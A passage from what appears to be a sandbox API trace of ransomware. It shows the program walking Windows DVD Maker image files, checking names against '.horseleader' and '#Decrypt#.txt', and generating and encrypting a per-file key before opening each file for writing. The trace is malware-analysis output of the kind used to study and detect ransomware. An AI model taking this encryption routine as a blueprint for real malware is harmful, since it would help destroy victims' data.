Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.825] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f4df463, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f4df463, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xca59, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="mainscroll.png", cAlternateFileName="")) returned 1 [0251.825] lstrcmpiW (lpString1="mainscroll.png", lpString2="Windows") returned -1 [0251.825] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png") returned 78 [0251.826] StrStrIW (lpFirst="mainscroll.png", lpSrch=".horseleader") returned 0x0 [0251.826] lstrcmpW (lpString1="mainscroll.png", lpString2="#Decrypt#.txt") returned 1 [0251.826] lstrcmpW (lpString1="mainscroll.png", lpString2="_uninstalling_.png") returned 1 [0251.826] lstrlenW (lpString=".testttjffg") returned 11 [0251.826] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png", lpSrch=".testttjffg") returned 0x0 [0251.826] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.826] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.826] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\mainscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\mainscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.827] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5e9dee, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5e9dee, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc22bf7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.827] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.827] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png") returned 96 [0251.827] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.827] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.827] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.827] lstrlenW (lpString=".testttjffg") returned 11 [0251.827] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.827] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.828] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: 
pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.828] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f60ff4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f60ff4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fc95011, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.828] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.828] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png") returned 102 [0251.828] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.828] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.828] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.828] lstrlenW (lpString=".testttjffg") returned 11 [0251.828] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.828] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, 
pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.828] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.828] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.828] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f60ff4b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f60ff4b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.829] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.829] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png") returned 97 [0251.829] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.829] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.829] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.829] lstrlenW (lpString=".testttjffg") returned 11 [0251.829] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.829] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.829] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.829] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.829] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f6360a8, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f6360a8, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.829] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.829] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png") returned 103 [0251.829] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.829] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.829] lstrcmpW 
(lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.829] lstrlenW (lpString=".testttjffg") returned 11 [0251.830] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.830] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.830] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.830] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f65c205, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f65c205, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.830] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.830] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png") returned 94 [0251.830] StrStrIW 
(lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.830] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.830] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.830] lstrlenW (lpString=".testttjffg") returned 11 [0251.830] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.830] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.830] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.830] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.831] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f65c205, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f65c205, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.831] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.831] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png") returned 100 [0251.831] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.831] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.831] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.831] lstrlenW (lpString=".testttjffg") returned 11 [0251.831] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.831] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.831] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.831] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.831] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f52b71d, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f52b71d, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x17719, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="scenesscroll.png", cAlternateFileName="")) returned 1 [0251.831] 
lstrcmpiW (lpString1="scenesscroll.png", lpString2="Windows") returned -1 [0251.831] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png") returned 80 [0251.832] StrStrIW (lpFirst="scenesscroll.png", lpSrch=".horseleader") returned 0x0 [0251.832] lstrcmpW (lpString1="scenesscroll.png", lpString2="#Decrypt#.txt") returned 1 [0251.832] lstrcmpW (lpString1="scenesscroll.png", lpString2="_uninstalling_.png") returned 1 [0251.832] lstrlenW (lpString=".testttjffg") returned 11 [0251.832] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png", lpSrch=".testttjffg") returned 0x0 [0251.832] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.832] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.832] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\scenesscroll.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\scenesscroll.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.832] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5055c0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5055c0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb30, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="specialmainsubpicture.png", cAlternateFileName="")) returned 
1 [0251.832] lstrcmpiW (lpString1="specialmainsubpicture.png", lpString2="Windows") returned -1 [0251.833] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png") returned 89 [0251.833] StrStrIW (lpFirst="specialmainsubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.833] lstrcmpW (lpString1="specialmainsubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.833] lstrcmpW (lpString1="specialmainsubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.833] lstrlenW (lpString=".testttjffg") returned 11 [0251.833] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.833] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.833] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.833] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\specialmainsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialmainsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.833] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5c3c91, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f5c3c91, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd536e7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cf, dwReserved0=0x7e1110, 
dwReserved1=0xfbc691b5, cFileName="SpecialNavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.833] lstrcmpiW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.833] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png") returned 103 [0251.833] StrStrIW (lpFirst="SpecialNavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.834] lstrcmpW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.834] lstrcmpW (lpString1="SpecialNavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.834] lstrlenW (lpString=".testttjffg") returned 11 [0251.834] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.834] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.834] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.834] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.834] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f5c3c91, ftCreationTime.dwHighDateTime=0x1ca03fb, 
ftLastAccessTime.dwLowDateTime=0x6f5c3c91, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbd6, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.834] lstrcmpiW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.835] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png") returned 109 [0251.835] StrStrIW (lpFirst="SpecialNavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.835] lstrcmpW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.835] lstrcmpW (lpString1="SpecialNavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.835] lstrlenW (lpString=".testttjffg") returned 11 [0251.835] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.835] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.835] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.835] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\specialoccasion\\specialnavigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.836] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f59db34, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f59db34, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4fd79845, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x12cf, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="SpecialNavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.836] lstrcmpiW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.837] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png") returned 104 [0251.837] StrStrIW (lpFirst="SpecialNavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.837] lstrcmpW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.837] lstrcmpW (lpString1="SpecialNavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.837] lstrlenW (lpString=".testttjffg") returned 11 [0251.837] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\SpecialOccasion\\SpecialNavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.837] CryptGenRandom (in: 